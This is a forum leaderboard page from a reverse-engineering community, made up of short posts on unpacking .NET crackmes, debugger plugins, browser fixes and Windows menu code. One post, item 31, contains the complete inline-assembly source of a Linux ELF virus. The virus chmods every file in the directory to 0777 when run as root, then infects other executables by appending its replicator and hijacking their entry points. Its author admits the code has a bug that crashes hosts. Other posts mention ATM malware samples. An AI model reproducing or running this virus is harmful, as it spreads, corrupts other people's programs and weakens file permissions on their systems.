Jump to content
Tuts 4 You

Leaderboard


Popular Content

Showing content with the highest reputation since 04/21/2019 in all areas

  1. 6 points
    Everyone can see the code because Cawk's ConfuserEx unpacker works just fine.
  2. 4 points
    Hmmmm... Could it be because you didn't do time travel and never experienced 4th of May 2019 before? The expired certificate is inside your outdated copy of Firefox 56. And, as you said it yourself - you refuse to update it. So, how on earth do you expect Mozilla to fix something that's on your computer? Should they send Santa with magic powers to your home? Solution: download the XPI file from above. Extract files from it. Base64-decode new certificate from api.js. Add new certificate into your old Firefox (Tools-Options-Certificates). Done. Takes less time than writing those whiny posts. Full disclaimer: I couldn't test it 100% because I don't use Firefox on a daily basis and I couldn't find portable Firefox 56 with 3rd party addons.
  3. 3 points
    Download: https://github.com/horsicq/nfdx64dbg/releases Sources: https://github.com/horsicq/nfdx64dbg More Info: https://n10info.blogspot.com/2017/05/nfd-plugin-for-x64dbg.html
  4. 3 points
    And here is the fully deobfuscated file with strings decrypted i havent ran through de4dot since this will simplify your button click method to one messagebox.show Unpacked.exe
  5. 3 points
    Here is the code without strings decrypted more to show that i havent just remade the method from scratch but have actually devirtualised the file obfuscator is not that good in all honesty once you get your head around everything in one method its just like any other vm private void button1_Click(object sender, EventArgs e) { int num = 0; if (num != 0) { object obj; char[] value = obj = new char[16]; obj[0] = (2049885642 ^ 2049885579); obj[1] = (721969625 ^ 721969580); obj[2] = (1722827470 ^ 1722827450); obj[3] = (675984423 ^ 675984463); obj[4] = (1647779473 ^ 1647779505); obj[5] = (1793770717 ^ 1793770638); obj[6] = (640259843 ^ 640259958); obj[7] = (959731082 ^ 959731177); obj[8] = (1744869780 ^ 1744869879); obj[9] = (237600744 ^ 237600653); obj[10] = (492056264 ^ 492056251); obj[11] = (327956409 ^ 327956426); obj[12] = (688741927 ^ 688741953); obj[13] = (658212064 ^ 658211989); obj[14] = (454212694 ^ 454212666); obj[15] = (28756323 ^ 28756290); MessageBox.Show(new string(value)); } else { object obj; char[] value2 = obj = new char[10]; obj[0] = (1435200779 ^ 1435200842); obj[1] = (853162666 ^ 853162719); obj[2] = (2119875586 ^ 2119875702); obj[3] = (712244489 ^ 712244577); obj[4] = (1541140050 ^ 1541140082); obj[5] = (2107783153 ^ 2107783095); obj[6] = (1703953462 ^ 1703953495); obj[7] = (1864360465 ^ 1864360568); obj[8] = (2035746888 ^ 2035746852); obj[9] = (620298057 ^ 620298088); MessageBox.Show(new string(value2)); } }
  6. 3 points
    I really, really disagree. Not all websites are valuable. And not all passwords should chosen to be secure. In fact, this was something I wanted to write about for a long time already, so here it goes: https://lifeinhex.com/my-password-is-password/ (shameless self-promo, I know! )
  7. 2 points
    Embarrassing. Don't trust anything that looks like a pregnancy test kit... Ted.
  8. 2 points
    Run the target first with NETBox so won't kill .NET PE. Dump with MegaDumper. In dumped exe change Image Base to 400000 Fix relocation with Universal Fixer Native DLL UnpackMePlease.dll missing: DllSaver break if module contains UnpackMePlease Unpacked exes: https://www112.zippyshare.com/v/26CxsdFV/file.html
  9. 2 points
    login pass: steps to unpack: 1. removed anti tamper and some junk calls 2. cleaned cflow (Thanks to Tesla for cflow cleaning) 2. removed proxy calls 3. removed proxy calls again 4. converted x86 methods to IL 5. decrypted all constants 6. cleaned cflow again (Thanks to Tesla for cflow cleaning) 7. cleaned some small stuff with de4dot. UnpackMe3-cleaned_noProxy_noProxy-NoX862-StringDec_cleaned-cleaned.exe
  10. 2 points
    well, your post is in the crackme section. it means unpacking doesn't really matter. but since you want the file unpacked. here you go. serial key: steps: 1. removed anti tamper 2. converted x86 methods to IL 3. decrypted strings 4. removed delegates 5. attempted to clean cflow (but its not very clean.) 6. cleaned with de4dot CrackMe_fixed-NoX862.exe_unpacked-StringDec_nodelegate-cleaned-cleaned.exe
  11. 2 points
    All samples has been pulled into hybrid-analysis.com sandboxes also looks like we disturbed someone: http://atm.cybercrime-tracker.net/index.php?x=threat&hash=b57bc410683aba4c211e407320e6b7746ce25e06d81ddf480711228efd921a6c
  12. 2 points
    https://www.youtube.com/watch?v=bcByQtkpmPg
  13. 2 points
    Best days of programming before all this Java and Android chaos
  14. 2 points
    Thanks a lot for testing. Please download the new version of the plugin: https://github.com/horsicq/stringsx64dbg/releases
  15. 2 points
    Here is the hotfix for anyone who wants to install without turning on Data Collection and Use... hotfix-update-xpi-intermediate@mozilla.com-1.0.2-signed.xpi
  16. 2 points
    https://www.bleepingcomputer.com/news/microsoft/windows-10-start-menu-gets-its-own-process-in-build-1903/ This should have happened a long time ago though it could be an indication Start is becoming bloated under Windows 10... Ted.
  17. 2 points
    You can still read menu item strings using the GetMenuString function. What I meant previously was that you have to change my example code to work differently with the DrawText function as the string of characters for, "Tuts 4 You", was not saved in the menu structure. The next example has, "Tuts 4 You", saved in the menu structure so you will be able to find this using GetMenuString. Each character is individually retrieved from the menu string and DrawText is used to display it. It also cycles through each RGB colour as before. When you click on a menu item GetMenuString is used to get the menu item text. It is then displayed in a message. I have attached both x32 and x64 this time. Apologies for the previous compile mistake! Ted. Appended Menu Items x64.exe Appended Menu Items x32.exe
  18. 2 points
    It builds a lot on your previous crackmes. So, most of the answers are already there. 1) Finding first 2 checks - they are in 2 separate dynamic methods. You can simply patch those; 2) Third check is in yet another dynamic method. You can patch it, and play the game till the end. However, the game never shows success screen. I think it's a bug in the crackme, as I could not find any code that would set the required field; 3) There are different ways to get IL code of the dynamic method, for example, this breakpoint might help: 4) To patch crackme, you need to understand how it stores information about dynamic methods. See previous crackmes and solutions for some details and hints. 5) Also you'll need to understand how jit hook decrypts IL code. There's nothing original in it: VirtualProtect -> decrypt code in-place -> jit it -> encrypt code back -> VirtualProtect. Very easy to break in several different ways. So, attached are 2 different versions of solution. First solution patches all 3 checks, you can play the game till the end but not get the success screen. Second solution gives you instant win and shows success screen. Bonus: the secret "cheat" code is checked on timer procedure. If you type it quickly enough, it will show the playing field: minesweeper-solution-kao.zip
  19. 1 point
    @LCF-AT Open T:\Program Files\brave\73.2.17.13\brave_resources.pak to a hex editor (dont try w/ notepad++) ASCII search for : brave_new_tab.js replace it with arave_new_tab.js or whitespace whole @ : <script src="chrome://newtab/brave_new_tab.js"></script> tested & working greets @NeWOT
  20. 1 point
    I made a small tutorial (originally published on Training Circle forum) about keygenning a recent ATM malware sample who passed our gate. this is addressed to beginners. keygenning.dispcash.19.tutorial.zip
  21. 1 point
    Sometimes I think Opera is run by a bunch of idiots. I've been using Opera since it was built on Presto engine. They break old versions compatibility without a blink of an eye, I have lost my favourites countless times by upgrading previous version of Opera, it was gone like that - hundreds of bookmarks, since then I have stopped using it at all. Then I have switched to this Chrome based version (just because I was too used to right mouse gestures) and I hate it, they change colors like this pink shit, they change the way startup window is shown (speeddial), they have added some artificial animations after opening a new tabs, it's not possible to assign keyboard shortcuts to many actions (why?). I have contacted with them on their Twitter support many times with bug reports, filed their forms to report bugs - no response at all... You should see their support forums, many people are upset about their "breaking changes" and they don't do anything about it. I'm thinking about moving to Vivaldi, looks like much more customizable version.
  22. 1 point
    Heres the unpacked file found an old unpacker i had which worked on this file (i wont share) Metadata could be cleaned some more but here it is UnpackedBed.exe
  23. 1 point
    You got to start ManagedJitterFr4 (for Confuser) on NetBox 4.0; after that just Jit button when the first assembly is logged - first assembly is the main assembly.
  24. 1 point
    No, those are mostly fake attributes. It's just a modded cfex. I didn't go further to attempt to deobfuscate it because it lags so much at the cctor part of module when compiling to c#. And it has flood calls when checking via IL which makes it harder to remove all calls that needs to be removed.
  25. 1 point
    Run original exe with NETBox 4.0 forget to specify version 4.0: https://forum.tuts4you.com/topic/39321-netbox/ Dump .NET exe main module with MegaDumper: https://forum.tuts4you.com/topic/24087-dotnet-dumper-10/page/3/?tab=comments#comment-177260 You should load original exe with dllsaver: https://forum.tuts4you.com/topic/39871-dllsaver/ As for ILProtector unpacking I've used a private tool I won't share!
  26. 1 point
    Step 1: Few notes: is used .NET module trick; you can dump the .NET module with memcpyLogger, You just have find to the first the block which starts with MZ. You get the module assembly entry point token with ConfuserExConstant.exe - as file input you enter original protected file, The Entry Point Token value is 600009C Tools used: https://www115.zippyshare.com/v/HETHPm4D/file.html Step 1: Dumping .NET module explained before; Step2: Confuser Exceptions Restore - anti-tamper: - this is for decrypting MSIL: https://forum.tuts4you.com/topic/41025-confuser-exceptions-restore-anti-tamper It works just fine you must unmark "Invoke EP" and "Patch Anti-tamper". So after we nop first method from <Module>.ctor - this was the anti-tamper; we also fix the entry point of koi module with 600009C Here is the partial unpacked exe: https://www8.zippyshare.com/v/M78VMowQ/file.html or string decryption I've used this: https://github.com/cawk/ConfuserEx-Static-String-Decryptor/releases Check/Mark "Invoke". For c-flow I've used ConfuserExSwitchKiller. ConfuserExCallFixer.exe for inline methods. Here is completly deobfuscated exe: https://www119.zippyshare.com/v/YFwpUuCv/file.html private void method_1(object sender, EventArgs e) { if (this.textBox_1.get_Text().Length >= 5) { string str = this.textBox_1.get_Text(); if (!Directory.Exists(@"Data\\License")) { MessageBox.Show("Password was not found!", str); } else { StreamReader reader = new StreamReader(@"Data\\License\license.dat"); reader.ReadLine(); string str3 = reader.ReadLine(); reader.Close(); if (Class7.smethod_1(str3) == this.textBox_1.get_Text()) { MessageBox.Show("Good Job !"); } else { MessageBox.Show("password is wrong!"); } } } else { MessageBox.Show("Password is invaled or too short!"); } } public static string smethod_1(string string_2) { byte[] inputBuffer = Convert.FromBase64String(string_2); AesCryptoServiceProvider provider = new AesCryptoServiceProvider { BlockSize = 0x80, KeySize = 0x100, Key = Encoding.ASCII.GetBytes(string_1), IV = Encoding.ASCII.GetBytes(string_0), Padding = PaddingMode.PKCS7, Mode = CipherMode.CBC }; ICryptoTransform transform = provider.CreateDecryptor(provider.Key, provider.IV); byte[] bytes = transform.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length); transform.Dispose(); return Encoding.ASCII.GetString(bytes); }
  27. 1 point
    Unpacked! pass:
  28. 1 point
    Microsoft is open-sourcing PowerToys on GitHub, so anyone can contribute and create power user tools for Windows 10. The first two utilities that Microsoft is working on for Windows 10 are a new maximize to desktop widget and a Windows key shortcut guide. The maximize to desktop widget places a pop-up button over the maximize button when you hover over it. It’s designed to let you quickly send an app to another desktop, utilizing Windows 10’s multi-desktop view. The Windows shortcut guide utility simply shows a keyboard shortcut guide when you hold down the Windows key. Microsoft is also considering 10 other utilities for these new PowerToys for Windows 10: Full window manager, including specific layouts for docking and undocking laptops Keyboard shortcut manager Win+R replacement Better alt+tab including browser tab integration and search for running apps Battery tracker Batch file re-namer Quick resolution swaps in task bar Mouse events without focus Cmd (or PS or Bash) from here Contents menu file browsing Repo: https://github.com/Microsoft/PowerToys Windows Calculator was already open sourced here: https://github.com/Microsoft/calculator Apparently it will soon feature a graphing mode.
  29. 1 point
    I am still not entirely sure what it is you are trying to achieve, I think you may be over-complicating things. If you are setting a custom colour scheme for a window and menus it will be much easier to access those colour values somewhere since you already know them. If you are owner drawing menus on each WM_DRAWITEM there will be no colour values to find unless they have been created. If you know the window coordinates or have a handle to a device context of a bitmap you could use GetPixel function... Ted.
  30. 1 point
    Don't let me son find out about this... 😉 Ted.
  31. 1 point
    //./gcc -m32 -masm=intel -o file file.c //https://www.cs.bgu.ac.il/~caspl152/wiki.files/ps05_152.pdf\ //One-oh-one on Linux Virii written by herm1t (x) VxHeavens.com, June 2010 //Since Ive now written a parasite in both x86 formats (Win & Lin) //Things need to be said about this knowledge and power //When I 1st began writing viruses (or virii for all those correctedness types //I strove to be as a good as 29A - still i fall short of such titles //I owe my mentor herm1t (and other VXRs) a ton of respect //for putting up with my constant annoyances of every line and piece of new code //added - thanks herm1t for not holding my hand (in facf youre tutorial insists upon //c-coding one (why use ASM? more of a challenge, and i save c-code VXng for //rootkits.) Lulz and thanks to everyone else out there who (because I am bad for //reputational marketing images) i wont know, but thanks for //putting up with me, and, my prior VX codes that were not so good (which ill fix up in time) //The VX scene isnt dead, though the VXR is not looked at too kindly these days //contrary to those of old days, now that cybermalware has reached the apex of //causing billions of $$ worth of problems to govt's and systems of the world yearly //We true VXR who only set out to show knowledge can never condone ruining another //system but its what you set out to do with this knowledge that makes you // //This thing isnt perfect. My itr82 jump is faulty (so no files to infect causes problems.) //I was going to fix it, until I realized after testing it against 3 hello-world GTK //and 3 hello-world c-codes that so long as the parasite can eat and live, all programs //will work fine post-infection. If the parasite has a host the parasite lives on, and so //hopefully, with a proper Commensalism relationships in place, so does the host. //No files to infect, and the infected host seg-faults and dies turning it into //a Parasitism relationship - but feed it some progs and alive it is again //This parasite only adds its replicator code, it does no true damage (unless i messed up) //--"The Lord will even dwell within the darkness" Solomon 1 Kings 8:12 asm(".intel_syntax noprefix\n"); void main() { asm( "_code:\n" "call _start\n" "_start:\n" "pushad\n" //======================================================================= //GRAB DIRECTORY ENTRIES //USE STACK SPACE FOR NOW // eax ebx ecx edx esi edi //sys_open 0x05 const char __user *filename int flags int mode - - // eax ebx ecx edx esi edi //sys_getdents 0x8d unsigned int fd struct linux_dirent __user *dirent unsigned int count - - "_getdents:\n" "push 0x2e\n" //push "." to stack "mov ebx,esp\n" //load the reg with it "xor ecx,ecx\n" //set option to R_ONLY "mov edx,0x400\n" //READ_ONLY "mov eax,0x05\n" //call open dir "int 0x80\n" "sub esp,0x500000\n" "mov ebx,eax\n" "mov eax,0x8d\n" //getdents "mov ecx,esp\n" //store to stack "mov edx,0x500000\n" //len of reserved space for getdents info "int 0x80\n" //[esp-0x500000] = getdents stuff //======================================================================= // GOT ROOT? //IF SO CHMOD ALL FILES // eax ebx ecx edx esi edi //sys_getuid 0xc7 - - - - - "mov eax,0xc7\n" "int 0x80\n" "cmp eax,0x00\n" // ROOT=0x00 "jne _root_chmod_skip\n" //=================================================== //WE GOT ROOT CHMOD RWE ALL FILES 0x777 //ESP = getdents struct // eax ebx ecx edx esi edi //sys_chmod 0x0f const char __user *filename mode_t mode - - - "_root_chmod:\n" "mov ebp,esp\n" "mov ebx,ebp\n" //EBP=GETDENTS //===================================== "xor edi,edi\n" "_iter8:\n" "xor ecx,ecx\n" "mov cx,word ptr [ebx+0x08]\n" "add ecx,ebx\n" "cmp byte ptr[ecx-1],0x00\n" "je _root_chmod_skip\n" "push ecx\n" //start of next entry "cmp byte ptr [ecx-0x01],0x08\n" "je _ffound\n" "pop ecx\n" "mov ebx,ecx\n" "jmp _iter8\n" //===================================== "_ffound:\n" "mov ecx,ebx\n" "add ecx,0x0A\n" "push ebx\n" "mov ebx,ecx\n" //ebx & ecx=fname "mov eax,0x0f\n" //CHMOD "mov ecx,0x1ff\n" //RWE ALL USERS "int 0x80\n" //call "pop ebx\n" "pop ecx\n" "mov ebx,ecx\n" "jmp _iter8\n" //=================================== //================================================= //CONTINUE WITH //PRIVS WE HAVE AND HOPE //FOR THE BEST //================================================= "_root_chmod_skip:\n" "mov ebp,esp\n" "mov ebx,ebp\n" "xor edi,edi\n" "_iter82:\n" "xor ecx,ecx\n" "mov cx,word ptr [ebx+0x08]\n" "add ecx,ebx\n" "cmp byte ptr[ecx],0x00\n" //<--------------****safety loop**** "je _code_end\n" "push ecx\n" //start of next entry "cmp byte ptr [ecx-0x01],0x08\n" "je _ffound2\n" "pop ecx\n" "mov ebx,ecx\n" "jmp _iter82\n" //===================================== "_ffound2:\n" "mov ecx,ebx\n" "add ecx,0x0A\n" //ECX=FNAME "push ebx\n" "jmp _stat\n" "_stat_ret:\n" //AT THIS POINT //[EDI]=HEAP START //[EBP]=GETDETNS INFO //[ESI]=FSIZE //[ESP]= ->GETDENTS.FNAME@0x0A "jmp _fopen\n" "_fopen_ret:\n" "jmp _fread\n" "_fread_ret:\n" "jmp _is_elf\n" "_is_elf_ret:\n" //infect ELF heap //write ELF heap to file //close "pop ebx\n" "pop ecx\n" "mov ebx,ecx\n" "jmp _iter82\n" //=================================== //=========================================== //IS IT AN ELF FILE? "_is_elf:\n" "cmp dword ptr[edi],0x464c457f\n" //.FLE "jne _is_elf_ret\n" "cmp byte ptr[edi+0x04],0x01\n" //x86 file? "jne _is_elf_ret\n" "cmp byte ptr[edi+0x05],0x01\n" //LSB? "jne _is_elf_ret\n" "xor eax,eax\n" "mov al,byte ptr[edi+0x28]\n" "xor ecx,ecx\n" "mov cx,word ptr[edi+0x2a]\n" "xor edx,edx\n" "mov dx,word ptr[edi+0x2c]\n" "add eax,edi\n" "_hdr_iter8:\n" "cmp dword ptr[eax],0x01\n" "je _hdr_mod\n" "cmp dword ptr[eax],0x07\n" "ja _is_elf_ret\n" "_itr8_rep:\n" "add eax,ecx\n" "jmp _hdr_iter8\n" "_hdr_mod:\n" //[eax]=P_hdr_start "cmp [eax+0x08],esi\n" "jb _itr8_rep\n" "mov ecx,[eax+0x1c]\n" //ecx=seg_align "add ecx,ecx\n" "mov edx,[eax+0x14]\n" "add edx,ecx\n" "or edx,0x0fff\n" "xor edx,0xfff\n" //edx=align*2 + p_fsize| || "mov [eax+0x14],edx\n" "mov [eax+0x10],edx\n" //file_heap_fsize & memsize incr "mov edx,0x00000007\n" "mov [eax+0x18],edx\n" //last seg is RWE //lets store the orig_ep into an unreserved header location //and head to EOF "mov ecx,edi\n" "mov edx,[ecx+0x18]\n" //edx=orig EP "mov [ecx+0x0c],edx\n" //@file_heap[elf_hdr+0x0c]=host orig_ep "mov ecx,edi\n" "add ecx,esi\n" //========================================= //WE ADJUSTED THE LAST LOAD SEGMENT //WE ADDED 0x1000 2 HEAP WHEN ALLOCATED //NOW ADD IN SHELL+PARASITIC CODE "pushad\n" //save reg state "call _delta\n" "_delta:\n" "mov edi,ecx\n" "pop esi\n" //esi should have code start loc. "sub esi,0x124\n" "mov ecx,0x280\n" //# of bytes "rep movsb\n" //========================================= //NOTE: change Orig_ep ->shell "mov ecx,[esp]\n" //ecx=ELF in heap "add ecx,0x18\n" //edi = eof+para_end //get current base "call _delta2\n" "_delta2:\n" "pop ecx\n" "or ecx,0xfff\n" "xor ecx,0xfff\n" //eax = heap file_last_seg //ecx = orig host ep seg //edx = orig host ep value //esi = orig host ep seg 0xfff //edi = heap file eof //esp = heaped file //[esp+0x04] = fsize host //edi-0x200 = host eof parasite start //[esp+0x1c] = ptr -> last seg //get last seg align //calc va of parasite and write it into host ep //calc host orig ep and write opcode jump to it //get parasite start location -> EOF_host //write "X" infected //add cmp to detect eof "x" "mov ebx,edi\n" "sub ebx,0x200\n" "push ebx\n" "mov ebx,eax\n" "add ebx,0x1c\n" "mov ebx,[ebx]\n" "add [esp],ebx\n" "pop ebx\n" "push edx\n" "mov edx,[esp+0x04]\n" "add edx,0x18\n" "or ebx,0xffff0000\n" "xor ebx,0xffff0000\n" "mov ecx,eax\n" "add ecx,0x1c\n" "mov ecx,[ecx]\n" "mov ebx,[esp+0x08]\n" "add ebx,ecx\n" "mov [edx],ebx\n" //hello == 4cac "pop edx\n" //============================================================ // eax ebx ecx edx esi edi //sys_write 0x04 unsigned int fd const char __user *buf size_t count - - // eax ebx ecx edx esi edi //sys_open 0x05 const char __user *filename int flags int mode - - "mov eax,0x05\n" "mov ebx,[esp+0x20]\n" "add ebx,0x0a\n" "mov ecx,0x02\n" "mov edx,0x700\n" "int 0x80\n" "mov ebx,eax\n" "mov eax,0x04\n" "mov ecx,[esp]\n" "mov edx,[esp+0x04]\n" "add edx,0x1000\n" "int 0x80\n" //============================================================ "popad\n" //restore reg state "jmp _code_end\n" //DEBUG******** 1-file COMMENT****** all-files "jmp _is_elf_ret\n" //=========================================== //================================================== // eax ebx ecx edx esi edi //sys_read 0x03 unsigned int fd char __user *buf size_t count - - "_fread:\n" "mov ebx,eax\n" "mov eax,0x03\n" "mov ecx,edi\n" "mov edx,esi\n" "int 0x80\n" "jmp _fread_ret\n" //=================================================== // eax ebx ecx edx esi edi //sys_open 0x05 const char __user *filename int flags int mode - - "_fopen:\n" "mov ebx,[esp]\n" "add ebx,0x0a\n" "mov eax,0x05\n" "mov ecx,0x02\n" "mov edx,0x700\n" "int 0x80\n" "cmp eax,0x00\n" "jge _fopen_ret\n" "pop ebx\n" "pop ecx\n" "mov ebx,ecx\n" "jmp _iter82\n" //"jmp _fopen_ret\n" //============================================= // eax ebx ecx edx esi edi //sys_newstat 0x6a char __user *filename struct stat __user *statbuf - - - "_stat:\n" "sub esp,0x100\n" "mov eax,0x6a\n" "mov ebx,ecx\n" "mov ecx,esp\n" "int 0x80\n" //[ecx+0x14]=fsize //===================================== "_heap_alloc:\n" "mov eax,0x2d\n" "mov ebx,edi\n" "int 0x80\n" "mov ebx,eax\n" "add ebx,[ecx+0x14]\n" //fix "add ebx,0x00001000\n" //fsize+virus_size**************** "mov eax,0x2d\n" "int 0x80\n" "sub eax,[ecx+0x14]\n" //fix "sub eax,0x00001000\n" //fsize+virus_size***************** //======================== //CHANGE HEAP TO RWE PRIVS "mov edx,0x07\n" "mov ebx,eax\n" "mov eax,0x7d\n" "int 0x80\n" //EBX = HEAP ADDRESS RWE //======================== "mov edi,ebx\n" //EDI=HEAP START "mov esi,[esp+0x14]\n" //ESI=FSIZE "add esp,0x100\n" "jmp _stat_ret\n" "nop\n" "nop\n" //============================================== //NOTE:JMP TO ORIG HOST EP "_code_end:\n" "add esp,0x500000\n" //return our stack to its orig state "add esp,0xc\n" "popad\n" "pop ecx\n" "mov edi,[eax]\n" "mov ecx,edi\n" "add ecx,0x0c\n" "add edi,[ecx]\n" "xor ecx,ecx\n" "jmp edi\n" //================================================ //================================================ //================================================ "mov eax,0x01\n" "int 0x80\n" "nop\n" "nop\n" "nop\n" ); }
  32. 1 point
    Nothing really different from your last crackme, just need to run it on de4dot before running on the quick tool i made. (Some stuff copy paste from the last tutorial i made for your last crackme) Tutorial: (Run through de4dot first or it will give errors, no idea why) Opening the .exe on Dnspy we can see that the methods have some kind of decompiler crashing. So what i did was simply loading the .exe and writing each instruction to console to see what is going on. Well a lot of ldc.i4.6 appeared as you can see here Simply made a quick tool to remove this Now you can open it on dnspy and see the actual code. But there are some anti-debuggers so i modified the tool that i made to remove the antidebuggers too. like this You can simply debug it now  CrackMe-antiskid-cleaned-Cleaned.exe
  33. 1 point
    Bug? x32dbg wrong address.
  34. 1 point
    after few months, i decided to try again and i have finally unpacked it! steps: 1. decrypted strings for parameter. 2. converted str that is actually an int value. 3. resolved all sizeOfs. 4. converted reference proxy calli to normal calls and removed the proxy calls. 5. Removed some Cflow. 6. calculated the integer values that uses xor to get the value. 7. decrypted all the strings. 8. cleaned cflows and the rest acrack-me_obfuscated_Unpacked.exend also renamed. Credits: Tesla - Helping remove cflow crack-me_obfuscated_Unpacked.exe
  35. 1 point
    https://www.zdnet.com/article/hacker-holding-git-repositories-for-ransom/ https://security.stackexchange.com/questions/209448/gitlab-account-hacked-and-repo-wiped == Download all of your GitHub data - https://github.com/settings/admin
  36. 1 point
    Unpacked! 1. Used dnspy to remove antitamper and the calls 2. converted all integer values that has something to do with strings ex: "epic".Length (my tool) 3. Resolved all SizeOf values with my tool 4. Calculated all math calls like Math.Truncate or Math.log10 with my tool 5. used de4dot to calculated the remaining stuff to get the field values. 6. grabbed the field values and removed the fields(marked as empty Types) with my tool 7. removed the cos and junk call that will always return 0 with any uint value you use in the parameter also marked as(marked as empty Types) (my tool) 8. cleaned the rest of math calculations with de4dot 9. TheProxy used his cflow killer to kill all the cflow Credits: TheProxy - Helping to remove the Cflow Mighty - helped me to get the types from operand (for sizeOf resolver) Autori and Blank - for tips pass: 1830 Screenshot: File: CrackMe3-StrToIntResolved-SizeOfRemoved-SysMathCallFixed-cleaned-EmptyTypesRemoved-EmptyTypesRemoved-cleaned_unpacked-StringDec-Cleaned.exe
  37. 1 point
    Language : .NET Platform : Windows x86 OS Version : All Packer / Protector : ConfuserEx Modded Description : Can you see the code? UnPackMe.exe
  38. 1 point
    No File->Load ??? Or the ability to run a script txt file?
  39. 1 point
    AdvancedScript_3.1 - fix CheckHexIsValid ( fix length ). - add menu to (copy - follow - delete) variables . - add more check for StrAnalyze. - add MsgBox for if command in a case does not resolve arguments. note : copy can copy one value or all values in case Array variables AdvancedScript_3.1.zip Script.zip
  40. 1 point
    Hi, so I dont like that color dark value because its aggressive and of course it looks very dumb too.I like decent bright colors whats also better for the eyes.Bright background / dark text are fine.Dark background / bright Text are bad.Firefox does handle the private tab mode better without to change the theme color in the working area/s (tabs / bars) and just putting a small private mode logo in the bar what dosent disturbs anyone you know.But changing the whole theme color in this mode like Opera / Brave etc does isnt really acceptable without to ask for permission by the user itself.Sorry,but its really stupid.So they also put a private Logo into the bar so why them also change the color theme!?Logo is enough so everyone can see this.Sometimes less is more.Of course its just my opinion. greetz
  41. 1 point
    useless ... offline I think it is better https://chrome.google.com/webstore/detail/quick-bookmark-cleaner/ljfgijlbekebdhniagdekklbmmchhjja
  42. 1 point
    GetMenuString function works fine, refer to the code snippet below... cchMax = GetMenuString_(hMenu, (wParam & $ffff), #Null, #Null, #MF_BYCOMMAND) cchMax = cchMax + 1 lpString.s = Space(cchMax) GetMenuString_(hMenu, (wParam & $ffff), @lpString.s, cchMax, #MF_BYCOMMAND) Debug lpString.s I suspect what you are trying to do is read text in the menu that has previously been drawn using the DrawText function. GetMenuString will not find these strings, you will have to work something else out. If the intention of using GetMenuString is a way of identifying a menu item that has been clicked on I think this is not the best way to go about it. When you add a menu item you should already know its position ID and the text that has been added. You can add and use this information in your array. When the menu item is clicked on you can find the position ID in wParam. You should then be able to use this as the reference point in your array... Ted.
  43. 1 point
    If you have a look at my DrawTextColoured procedure in my previous example and the one below you can see how I change the text colour and calculate the required positioning in the menu. The example (below) uses AppendMenu function to add items in to the owner drawn menu. It then adds the new item in to the menu array. You can also see how to add an icon/image in to these menu items. I included an example on how you can process menu events from WM_COMMAND. I suggest having a read through the Windows developers documents regarding menus, particularly the About section. https://docs.microsoft.com/en-au/windows/desktop/menurc/menus I have compiled the example for you this time in x32... Ted. Appended Menu Items.exe
  44. 1 point
    If you think a website is not worthy of a unique and strong password you may as well use a 10 minute throwaway email address to register - or a shared account. I think it good practice to be encouraging users in general and of websites to use and enforce unique and strong passwords. A website may be valuable to you and not to others. The option shouldn't be left open for a person whom values a site risk losing it from using a weak password because there are other users out there that don't care what they use... Ted.
  45. 1 point
    your password is tesfaw https://gyazo.com/37e85be8307829270736eb42156ed9f5 as kao said this isnt unbreakable at all
  46. 1 point
    If you look for a good reader for your pc get yourself a proxmark3 and if you just want to look into mifare 1k just get a cheap ACR122U from ebay. if you want to have fun get yourself and arduino or rpi with a pn532 module, it's capable of reading mifare 1k and i had already fun with it too, hacking few weak card systems and making portable nfc card cloner, with this module from adafruit, but there is alternatives who are cheaper. if you have a smartphone capable of nfc reading you can try android apps such as Tag NFC Cloner, work fine too. edit: related to credit card reading i don't now, but i'm sure something should exist in github.
  47. 1 point
    Unpacked Use any long key to pass checks. GetMe_unp.zip
  48. 1 point
    Just check the IAT start & End / Size manually in Olly and correct it if needed and then you are on the safe way.No big deal to do this quickly by yourself without always to trust blind any import tool.In this case ImpRec shows all correctly but also ImpRec can fail etc.Just wanna say that you should verify the found and shown results you know. greetz
  49. 1 point
  50. 1 point
  • Newsletter

    Want to keep up to date with all our latest news and information?

    Sign Up
×
×
  • Create New...